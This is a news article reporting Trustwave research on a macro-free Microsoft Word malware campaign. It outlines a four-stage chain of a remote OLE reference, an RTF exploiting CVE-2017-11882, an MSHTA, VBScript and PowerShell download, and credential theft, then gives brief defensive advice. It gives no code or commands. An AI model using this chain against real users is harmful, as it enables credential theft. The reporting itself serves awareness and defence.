New threat vector: Latest Microsoft Word malware doesn’t use macros to unleash attack

A popular method of infecting users with malware has been via Microsoft Office documents that are loaded with malicious macros. Chiefly among these documents are those from Microsoft Word as they are easy to social engineer victims into downloading them. The major reason for hackers utilizing Office documents has to do with the exploitable nature of macros. It is for this reason that macros are disabled by default, but they can be enabled by the choice of the user. But a new Microsoft Word malware attack shows that macros are not necessary to infect a machine. The research coming out of the security company Trustwave details a macro-free malware attack via Word documents in email attachments. The goal of the attack is to steal user credentials in the unsuspecting user’s email, FTP, and browsers via a “multi-stage email Word attack.”

The attack is in four parts, which are as follows (with direct quotes from the Trustwave report):

  1. The .docx file (created with Word 2007) is opened and this “allows external access to remote OLE objects to be referenced in the document.xml.rels”
  2. An RTF file download is triggered, which then executes the RTF file that leverages exploit (CVE-2017-11882) that targets MS Equation Editor tool.
  3. The RTF file will “execute an MSHTA command line which downloads and executes a remote HTA file. The HTA file contains VBScript... By decoding each character code in VBScript, it reveals a PowerShell Script which eventually ... executes a remote binary file.”
  4. The malicious payload is executed, stealing credentials “by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.”

The only defense against this particular Word malware is to practice common-sense cybersecurity strategies. Be wary of any email that comes from unknown sources, and most importantly, do not download any document unless you are absolutely certain that it is necessary.

Photo credit: Shutterstock

Derek Kortepeter

Derek Kortepeter is a graduate of UCLA and tech journalist that is committed to creating an informed society with regards to Information Security. Kortepeter specializes in areas such as penetration testing, cryptography, cyber warfare, and governmental InfoSec policy.

Published by
Derek Kortepeter

Recent Posts

Who says configuration management can’t be fun?

Managing change in an enterprise isn’t easy and it’s usually no fun. Here’s a book on configuration management that will…

2 hours ago

Choosing the right communication tools for your business

Choosing communication tools is like choosing a first progamming language. While you want easy, you also want cross-platform, security, and…

5 hours ago

Ignite 2019: Azure Arc extends Azure management across infrastructures

In one of the biggest announcements at this month's Ignite 2019, Microsoft gave us details Azure Arc, a new set…

22 hours ago

Your eyes are not playing tricks: New Azure Portal features

If you logged into Azure Portal over the past few days, you may have suffered a little disorientation. Some new…

1 day ago

Sky is falling: Will the cloud end up bankrupting your small business?

Cloud computing offers many benefits to small businesses, but it also brings certain risks, including the risk of bankrupting your…

1 day ago

Managing accelerated networking in Azure IaaS virtual machines

Configuring your IaaS Azure virtual machines to take advantage of accelerated networking can vastly improve network performance. Here’s how to…

1 day ago